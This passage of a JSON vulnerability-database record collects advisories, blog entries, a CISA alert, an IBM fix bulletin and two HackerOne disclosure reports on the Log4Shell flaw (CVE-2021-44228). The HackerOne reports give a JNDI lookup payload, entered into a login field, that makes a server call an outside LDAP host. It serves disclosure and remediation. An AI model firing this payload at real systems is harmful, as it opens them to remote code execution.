CVE-2021-44228, including third-party vendor solutions. Additionally, Imperva does not have any corporate external systems that are affected by this specific CVE.\n\n**Q: I need assistance or have questions. Who should I contact?**\n\nA: For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F>). If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions ](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:55:49", "type": "impervablog", "title": "Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:49", "id": "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "href": "https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-12-10T20:39:02", "description": "The post [Update on Log4Shell (CVE-2021-44228)](<https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {}, "published": "2021-12-10T20:22:36", "type": "wallarmlab", "title": "Update on Log4Shell (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:22:36", "id": "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "href": "https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-05-23T16:48:29", "bounty": 0.0, "description": "#Report\n\n**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n\n\n#Activity Timeline\n\n2021-12-10 18:16 (-0600) (comment)\nGreetings from the Department of Defense (DoD),\n\nThank you for supporting the DoD Vulnerability Disclosure Program (VDP).\n\nBy submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.\n\nThe VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.\n\nWe will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.\n\nOur goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.\n\nRegards,\n\nThe VDP Team\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)\nnull\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)\nGreetings,\n\nWe have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.\n\nThank you for bringing this vulnerability to our attention!\n\nWe will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.\n\nYou will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.\n\nThanks again for supporting the DoD Vulnerability Disclosure Program.\n\nRegards,\n\nThe VDP Team\n\n---\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T00:55:49", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:35:32", "id": "H1:1438393", "href": "https://hackerone.com/reports/1438393", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:48:28", "bounty": 0.0, "description": "**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T00:16:38", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:33:44", "id": "H1:1423496", "href": "https://hackerone.com/reports/1423496", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-24T13:56:24", "description": "CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches. The CSA provides information\u2014including tactics, techniques, and procedures and indicators of compromise\u2014derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following [VMware\u2019s release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), treat all affected VMware systems as compromised. See joint CSA [Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) for more information and additional recommendations. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-23T00:00:00", "type": "cisa", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-23T00:00:00", "id": "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2021-12-14T10:37:12", "description": "Log4Shell., also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "trendmicroblog", "title": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "href": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-12-03T16:11:58", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) 2.0.6.9 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated version of IDRM 2.0.6.10. Please see remediation steps below to apply fix. All customers encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM DRM| 2.0.6 \n \n\n\n## Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised first to upgrade to v2.0.6.9, and then apply the latest FixPack 2.0.6.10. \n\n**NOTE:** The FixPack is not cumulative. So it must be applied on top of 2.0.6.9 in sequence.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.1_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.4.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n5) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.1| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n4) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.2| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n3) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.3| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n2) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.4| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.5| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.7| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.8| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \nIBM Data Risk Manager| 2.0.6.9| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T04:28:35", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Data Risk Manager (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T04:28:35", "id": "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "href": "https://www.ibm.com/support/pages/node/6527094", "cvss": {"score": 9.3, "vector": 